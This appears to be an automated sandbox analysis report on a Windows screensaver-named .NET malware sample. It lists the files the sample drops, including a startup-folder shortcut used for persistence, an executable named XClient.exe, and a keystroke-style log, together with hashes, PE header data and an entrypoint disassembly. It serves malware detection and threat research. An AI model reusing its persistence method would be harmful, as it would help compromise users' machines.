                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\THITWNSEI24112908089786756456545346568789-00010.scr.exe.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.34331486778365
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):2232
                                                                  Entropy (8bit):5.381427237108526
                                                                  Encrypted:false
                                                                  SSDEEP:48:JWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8vUyus:JLHyIFKL3IZ2KRH9OugMs
                                                                  MD5:7CD349050FB75F338874D108DB3EF401
                                                                  SHA1:8D4CFBC495BF48A3526FB9FA16BF6BA4D498D942
                                                                  SHA-256:54A9F48193B837F609A14F95034B4B825DFED9C9C5BC752D76FCD21409AE4BFE
                                                                  SHA-512:8B4B9290FF9AC242FB4DBB49E6A76172B4BC905EADF96002DF6AEF61D6223BACF508314D077F031526ECEAE2FE82C0AF7B5A1D40B6DD0F07F587EEE4C10D88F9
                                                                  Malicious:false
                                                                  Preview:@...e.................................:..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                  C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29
                                                                  Entropy (8bit):3.598349098128234
                                                                  Encrypted:false
                                                                  SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                  MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                  SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                  SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                  SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                  Malicious:false
                                                                  Preview:....### explorer ###..[WIN]r

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14ddybti.jst.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1js5kjw5.trt.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_555y4be2.kbh.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uwjjvwc.q31.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iegmpa5c.esx.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhqgoy2v.wye.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkdbwfgj.w41.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kri3tbsj.tg0.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lg4viytm.cpt.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_so00wzps.fw5.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unqrnnh5.ubg.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjcmqc0s.15p.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vpzd3g1r.13c.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0ou4phd.zea.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdhw5w1u.y0y.psm1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y13qn2xa.rsr.ps1

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 2 20:05:27 2024, mtime=Mon Dec 2 20:05:27 2024, atime=Mon Dec 2 20:05:27 2024, length=516096, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):767
                                                                  Entropy (8bit):5.079666073902899
                                                                  Encrypted:false
                                                                  SSDEEP:12:8gW1244Mpnu8ChKlXIsY//yKLL9xn8d5rjABG+Hkplpj9mV:8hpJDTlXU/9xsABGFppm
                                                                  MD5:1CF15E706DBD064784CFDE02C4F2EA97
                                                                  SHA1:3BC14EC5208F4D9DA5F70DA22A83CD47B79A866E
                                                                  SHA-256:514153F103CC4F789886A5E2E9502C2488F34BA611EFC6FB0274B550F0B9EF41
                                                                  SHA-512:6D085A08EB0F5EBFA8FB0D892A9D2EAF27ED2994E6F46B8D4DB8BDD444223342D915D78ECE77F83BE128A9B94E4E18EF19B48D69B51AA182E867448E7CE377E8
                                                                  Malicious:false
                                                                  Preview:L..................F.... ...r....D..r....D..r....D..........................v.:..DG..Yr?.D..U..k0.&...&.......$..S....)...D......D......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.............................^.A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EW<2.Y....../.........................R.o.a.m.i.n.g.....b.2......Y.. .XClient.exe.H......Y...Y......d......................[..X.C.l.i.e.n.t...e.x.e.......\...............-.......[...........m*. .....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......468325...........hT..CrF.f4... ...1#....-...-$..hT..CrF.f4... ...1#....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                  C:\Users\user\AppData\Roaming\XClient.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):516096
                                                                  Entropy (8bit):7.615410059518491
                                                                  Encrypted:false
                                                                  SSDEEP:12288:uNIRt11XXjNZgYjirxY1dZqAi081zY5usx+XtJ:uNIp1XXjNIrq1S02zYx
                                                                  MD5:DD81E5AFCD1A13EEE9F9A28C6CDE2A56
                                                                  SHA1:CF99A76FC406FFD81C62FBF07BD65C80EEAE293F
                                                                  SHA-256:B399F5D239807FE144AD8872B4111002EBC6BB79EA6FAA417DB37F5FF95100EE
                                                                  SHA-512:B63633F877D4436BCD549A5BD79566D7D3EED7D3429AD44580B6F295CAAB9E44F562F45855CAD6DFF60AB5FBADC89C97289C31AAC3B45E7F1DF0476E610004BE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b................0.................. ........@.. .......................@............@.....................................O............................ ......4...p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........d...K......`........)...........................................0..M.........}......}.....(.....sn......(.............s....o....}g......o...s....o.....*....0...........s......o.....*".(.....*.0...........s".....o.....*..0..+.........,..{.......+....,...{....o........(.....*..0............o ....+..*.0..S..........+4...+.......(........X...(..../..o!......+....-....X...o".../..o!......+....-.*..0..............o#.......o!...Y..........,T...($.....b..(%....b`..(&...`....

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.615410059518491
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:THITWNSEI24112908089786756456545346568789-00010.scr.exe
                                                                  File size:516'096 bytes
                                                                  MD5:dd81e5afcd1a13eee9f9a28c6cde2a56
                                                                  SHA1:cf99a76fc406ffd81c62fbf07bd65c80eeae293f
                                                                  SHA256:b399f5d239807fe144ad8872b4111002ebc6bb79ea6faa417db37f5ff95100ee
                                                                  SHA512:b63633f877d4436bcd549a5bd79566d7d3eed7d3429ad44580b6f295caab9e44f562f45855cad6dff60ab5fbadc89c97289c31aac3b45e7f1df0476e610004be
                                                                  SSDEEP:12288:uNIRt11XXjNZgYjirxY1dZqAi081zY5usx+XtJ:uNIp1XXjNIrq1S02zYx
                                                                  TLSH:79B4E0986616DA03C59157B80E72F2B52BBC2EDDF501D2079FDA6DEFB836F011C48292
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b................0.................. ........@.. .......................@............@................................

                                                                  File Icon

                                                                  Icon Hash:00928e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x47f5ea
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0xE70462D1 [Sun Oct 26 01:52:17 2092 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
